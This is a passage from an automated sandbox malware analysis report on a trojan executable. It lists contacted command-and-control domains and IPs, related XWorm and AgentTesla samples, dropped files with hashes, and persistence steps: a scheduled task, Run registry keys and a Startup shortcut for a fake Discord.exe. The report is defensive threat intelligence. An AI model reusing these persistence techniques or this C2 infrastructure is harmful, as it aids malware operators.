                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                    http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                    methods-availability.gl.at.ply.gg4%VirustotalBrowse
                    https://github.com/Pester/Pester1%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    methods-availability.gl.at.ply.gg
                    		147.185.221.23
                    		truetrueunknown
                    ip-api.com
                    		208.95.112.1
                    		truetrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    methods-availability.gl.at.ply.ggtrueunknown
                    http://ip-api.com/line/?fields=hostingfalse
                    • URL Reputation: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://crl.microso?powershell.exe, 00000004.00000002.1877930359.000001ADB22E4000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1784597274.00000239C73F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1862924961.000001ADA9CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2003513944.0000021BE28E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1766087505.00000239B75A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2A98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      http://crl.microsK_opowershell.exe, 00000001.00000002.1792186081.00000239CFA10000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1766087505.00000239B75A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2A98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1784597274.00000239C73F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1862924961.000001ADA9CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2003513944.0000021BE28E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.microsoopowershell.exe, 00000004.00000002.1877930359.000001ADB22E4000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.1766087505.00000239B7381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.0000022956EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/names3OBQLA3xR.exe, 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1766087505.00000239B7381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.0000022956EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmpfalseunknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          208.95.112.1
                          		ip-api.comUnited States
                          		53334TUT-ASUStrue
                          147.185.221.23
                          		methods-availability.gl.at.ply.ggUnited States
                          		12087SALSGIVERUStrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1532616
                          Start date and time:2024-10-13 18:51:04 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 55s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:21
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:s3OBQLA3xR.exe
                          renamed because original name is a hash value
                          Original Sample Name:2b2a240fbda2933b546a6d1b495d21878b9bf67da1c7e5b4cad29c8b82c5d706.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@21/21@2/2
                          EGA Information:
                          • Successful, ratio: 10%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 112
                          • Number of non-executed functions: 6
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target Discord.exe, PID 1800 because it is empty
                          • Execution Graph export aborted for target Discord.exe, PID 6100 because it is empty
                          • Execution Graph export aborted for target Discord.exe, PID 7560 because it is empty
                          • Execution Graph export aborted for target Discord.exe, PID 7820 because it is empty
                          • Execution Graph export aborted for target Discord.exe, PID 7944 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 4996 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7476 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7716 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7984 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          12:52:02API Interceptor51x Sleep call for process: powershell.exe modified
                          12:52:53API Interceptor634151x Sleep call for process: s3OBQLA3xR.exe modified
                          17:52:54Task SchedulerRun new task: Discord path: C:\Users\user\AppData\Roaming\Discord.exe
                          17:52:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Discord C:\Users\user\AppData\Roaming\Discord.exe
                          17:53:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Discord C:\Users\user\AppData\Roaming\Discord.exe
                          17:53:13AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          208.95.112.1W1FREE.exeGet hashmaliciousXWormBrowse
                          • ip-api.com/line/?fields=hosting
                          Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          PO.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          4HyAcc2Dct.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          kUFcZgip68.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          download.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          2ktrFR0W3v.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                          • ip-api.com/json/
                          147.185.221.23W1FREE.exeGet hashmaliciousXWormBrowse
                            x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                              H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                  H1N45BQJ8x.exeGet hashmaliciousXWormBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ip-api.comW1FREE.exeGet hashmaliciousXWormBrowse
                                    • 208.95.112.1
                                    Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    PO.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    4HyAcc2Dct.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    kUFcZgip68.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    download.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    2ktrFR0W3v.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                    • 208.95.112.1

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    TUT-ASUSW1FREE.exeGet hashmaliciousXWormBrowse
                                    • 208.95.112.1
                                    Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    PO.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    4HyAcc2Dct.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    kUFcZgip68.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    download.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.95.112.1
                                    2ktrFR0W3v.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                    • 208.95.112.1
                                    SALSGIVERUSW1FREE.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.23
                                    dHp58IIEYz.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    Lr87y2w72r.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.18
                                    7LwVrYH7sy.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.18
                                    432mtXKD3l.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    5q4X9fRo4b.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                    • 147.185.221.17
                                    l18t80u9zg.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    Windows Defender.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.22
                                    x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.23
                                    e7WMhx18XN.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                    • 147.185.221.22

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Discord.exe.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\Discord.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):654
                                    Entropy (8bit):5.380476433908377
                                    Encrypted:false
                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................

                                    C:\Users\user\AppData\Local\Temp\Log.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\s3OBQLA3xR.exe
                                    File Type:Generic INItialization configuration [WIN]
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):3.6722687970803873
                                    Encrypted:false
                                    SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                    MD5:DE63D53293EBACE29F3F54832D739D40
                                    SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                    SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                    SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                    Malicious:false
                                    Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zipkzog.wbp.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zu4xfsi.o4n.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yqvmdb3.30w.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ao4aa30l.ywr.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bir5h0qu.unh.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvk43siu.m0e.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyg3uvcy.gtg.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdiytu4y.fs3.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghqtr1ff.1gu.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jph33gpi.ovp.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndljfo5w.3x4.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pi20cdd4.cv5.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pncfvtsf.ouw.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
